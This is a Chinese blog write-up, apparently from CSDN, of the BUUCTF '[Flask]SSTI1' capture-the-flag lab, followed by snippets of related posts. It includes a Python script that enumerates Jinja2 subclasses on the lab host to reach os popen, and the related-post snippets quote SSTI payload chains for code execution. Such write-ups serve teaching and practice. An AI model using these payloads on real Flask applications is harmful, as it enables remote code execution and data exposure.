[Flask]SSTI1

最新推荐文章于 2024-09-08 20:24:07 发布
最新推荐文章于 2024-09-08 20:24:07 发布
阅读量923 收藏 1
点赞数 1
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49893996/article/details/132134115
版权
文章讲述了在使用PythonFlask开发的环境中进行模板注入攻击的过程,尝试GET和POST方法,发现name参数有效。通过遍历类索引找到os类,进而试图执行命令查找flag。最终揭示flag隐藏在env配置对象的环境变量中。
摘要由CSDN通过智能技术生成

根据题目提示,这关应该是基于Python flask的模版注入,进入靶场环境后就是一段字符串,而且没有任何提示,有点难受,主要是没有提示注入点

 随机尝试一下咯,首先尝试一下guest,GET传参

但是没有反应,难道是POST?

 直接报错,说明不是的,接着尝试一下name

 name传参回显成功,并成功验证为flask

 但是到这里就有点奇怪,页面没回显了,一开始我以为是有过滤存在,但是一直没有成功

 最后查看了一下wp,结果是在源码中才看得到回显结果,既然有回显那就继续注入

 

 查看所有类后,我们接着用一个python代码去寻找我们需要的os类

 

import requests

for i in range(500):
    url = "http://node4.buuoj.cn:25499/?name={{().__class__.__base__.__subclasses__()["+str(i)+"]}}"
    try:
        response = requests.get(url = url)
        if response.status_code == 200:
            
            if 'os._wrap_close' in response.text:
                print(i)
                print(response.text)
    except:
        pass

 得知类的下标位置后,我们就可以直接访问咯

 

 调用popen函数,以便执行命令

但是在查看所有文件后,没有发现flag文件

完全找不到flag信息 

最后经过查看wp,得知flag信息在env文件下,也可以说在flask的环境变量下

 

env

env是Flask一个用于存储环境配置信息的对象。

在Flask中,env用于存储应用程序的配置信息。env的配置信息可以通过多种方式设置,包括从环境变量、配置文件、命令行参数等获取。

陈艺秋
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Flask SSTI注入学习
LJFYYJ的博客
07-23 531
Flask SSTI注入
关于flaskSSTI注入
Kr的博客
01-21 7229
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 3200
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
[Flask]SSTI
1ance's blog
11-18 1526
文章目录环境解题思路参考 环境 BUUCTF上的在线环境,启动靶机,获取链接: http://node4.buuoj.cn:27904 解题思路 访问后显示页面。 根据题目提示是考SSTI,所以我们传个name参数看看。 http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。 我们在构造{{2*3}}看看,是否存在SSTI。 成功执行了乘法,说明是存在SSTI的,接下来我们要做的是寻找可以执行命令的函数所在的类。 这里我在网上找的: {% for c in
[Flask]SSTI1 buuctf
weixin_74790320的博客
02-18 536
然后我们就用{{''.__class__}}看类的类型,但是无所谓,啥类型都可以,因为我们要找到的是他的基类,然后通过基类去找子类。然后在子类中找到catch_warnings这个类,然后去这个类的全局变量里面找到eval,上面链接我复现了vulhub的SSTI,其实本质上是一道题。{{''.__class__.__base__}}找到基类。所以就可以命令执行,然后flag在env环境变量里面。声明:本篇文章csdn要我一天发两篇所以我来水的。{%code%}这里是代码的意思在ssti里面。
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 2707
Flask SSTI漏洞介绍及利用
SSTI Flask做题记录1
Firebasky的博客
10-12 1037
这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下 1. ezflask hdctfezflask地址 这个题比较简单,直接一层一层的去找一找利用的类和函数就可以啦 记录一下自己的步骤: 1.{{''.__class__}} # 获得单引号的类型 2.{{''.__class__.__base__}} #获得object 3.{{''.__class__.__base__.__subclasses__()}}#获得基类 4.{{''.__class__.__.
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3263
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
2401_84009698的博客
04-20 985
外链图片转存中…(img-6fV9ce6x-1713552193682)]
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
09-20
Flask SSTI的攻击场景中,一个简单的攻击示例是通过Flask的路由系统接收用户输入的参数,然后将其与模板结合进行渲染。例如,以下代码段创建了一个简单的Flask应用,并定义了一个路由来接收名为'name'的参数: ``...
flask SSTI漏洞
jiet07的博客
08-07 4504
文章目录第一章flask ssti漏洞的代码(长什么样子)第二章 前言(基础知识储备)第三章 服务器端模板(SST)第四章 服务器模板注入(SSTI)第五章 例子(CTF)第五章 如何防御服务器模板注入参考资料附录 第一章flask ssti漏洞的代码(长什么样子) 1.1 代码 from flask import Flask from flask import request from flask import render_template_string from flask import render
flaskssti模版注入从零到入门
Red Rapefruit
08-16 1077
前言 在学习ssti模版注入的时候,发现国内文章对于都是基于python基础之上的,对于基础代码讲的较少,而对于一些从事安全的新手师傅们,可能python只停留在写脚本上,所以上手的时候可能有点难度,毕竟不是搞python flask开发。就本人学习ssti而言,入手有点难度,所以特写此文,对于一些不需要深究python但是需要学习ssti的师傅,本文可能让你对flaskssti有所了解。 ssti漏洞成因 ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tor
[GYCTF2020]FlaskApp(SSTI
qq_45521281的博客
06-09 2982
进入题目: 是一个用flask写的一个base64加解密应用。有一个加密页面和解密页面,思路应该是在加密页面输入payload进行加密,加密结果在解密页面进行解密,输出解密后的payload被渲染到页面输出后执行了payload。 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。但是我当时看到的时候并没有想到是debug模式,这就是没有进行足够积累的后果。 base64decode在不会解析的时候就会报错,然后习惯性对base64解密页面进行报错实验,ba
buuctf [Flask]SSTI
qq_1873822的博客
03-16 2633
漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。 复现过程 访问http://node3.buuoj.cn:29153/?name={{2*2}} 说明SSTI漏洞存在。 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warni
Save OpenAI response in Azure function to Blob storage
suiusoar
09-06 1116
将 OpenAI 的响应保存在 Azure 函数中到 Blob 存储
如何处理Flask中的路由
sheji888的专栏
09-05 1109
Flask中,使用装饰器来定义路由。这个装饰器将URL路径与视图函数关联起来。视图函数是处理请求并返回响应的函数。在这个例子中,当用户访问应用的根URL()时,home函数会被调用,并返回字符串作为响应。
Flask中的上下文(Context)
最新发布
sheji888的专栏
09-08 856
Flask中的上下文是框架提供的一种强大机制,用于在Web开发过程中管理和访问应用级别和请求级别的状态信息。会话上下文、应用全局上下文和请求上下文分别用于实现跨请求的用户状态管理、应用全局状态共享和单次请求的环境管理。通过合理使用这些上下文机制,开发者可以更加灵活地编写Flask应用程序,提高代码的可维护性和可扩展性。需要注意的是,虽然上述三类上下文在Flask中扮演着重要角色,但Flask的官方文档和社区中并没有严格规定“会话上下文”这一术语的具体实现和用法。
Flask如何传递URL参数
sheji888的专栏
09-06 919
Flask中,传递URL参数是一种常见且强大的功能,它允许你的Web应用根据URL中的不同部分来动态地生成内容或执行不同的操作。虽然直接撰写5000字来详细解释这一功能可能过于冗长,但我可以提供一个简明而全面的概述,包括基本概念、使用场景、示例代码以及最佳实践。
Flask如何处理静态文件
sheji888的专栏
09-07 482
虽然Flask默认使用static文件夹作为静态文件目录,但开发者也可以通过参数来自定义静态文件目录的路径。这允许开发者根据自己的项目结构来灵活地组织静态文件。在上面的例子中,Flask将使用my_static文件夹作为静态文件的存储目录。Flask通过内置的静态文件处理功能,为开发者提供了一种便捷的方式来管理应用中的静态文件。开发者只需要将静态文件放置在指定的目录下,就可以通过Flask提供的URL路径来访问这些文件。同时,Flask还提供了url_for函数和。
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值